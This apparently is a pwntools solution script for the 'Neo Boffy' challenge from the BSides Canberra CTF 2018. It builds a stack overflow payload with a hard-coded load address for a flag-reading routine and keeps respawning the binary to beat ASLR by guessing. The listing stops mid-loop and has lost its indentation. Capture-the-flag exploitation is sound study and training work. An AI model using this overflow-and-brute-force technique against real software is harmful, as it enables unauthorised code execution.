Solution to Neo Boffy from the BSides Canberra CTF 2018
from pwn import *
# Target binary, given as a path relative to the current working directory.
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
# Can't send NULLs, but can send empty strings
def cmdify(str):
    """Split a payload on NUL bytes into a list of argument strings.

    A single process argument cannot carry an embedded NUL, so each NUL in
    the payload is turned into an argument boundary instead. Consecutive
    NULs therefore yield empty-string arguments, and a payload without any
    NUL comes back as a one-element list.
    """
    # The parameter name shadows the builtin `str`; it is kept so the
    # signature stays exactly as callers see it.
    pieces = str.split("\x00")
    return pieces
# Offset added to the image base below; presumably the location of a
# read_flag routine inside the binary (inferred from the name, confirm
# against the binary).
read_flag_offset = 0x8d0
# Absolute address = guessed load base + offset. The base is hard-coded
# because there is no ASLR leak, so the value is only correct on runs where
# the loader happens to choose this base; the retry loop further down covers
# the other runs.
# NOTE(review): the approach only works because the randomised base can be
# guessed within a practical number of respawns; more address-space entropy
# and alerting on repeated crashes of the same binary are the usual
# counter-measures.
read_flag = 0x565ee000 + read_flag_offset
loop_cap = 0x78  # This is where the loop caps

# Three NUL bytes (the author's note: "ensure we can keep looping") followed
# by the address packed with p32.
payload = "\x00" * 3 + p32(read_flag)
# One more byte whose value is loop_cap - 1 minus the length built so far.
payload += chr(loop_cap - 1 - len(payload))
# Left-pad with "A" up to 0x79 characters so the crafted bytes sit at the end.
payload = payload.rjust(0x79, "A")
# Keep trying until we find it
while True:
p = process([bin_path] + cmdify(payload))
out = p.recvall()
if "CTF{" in out: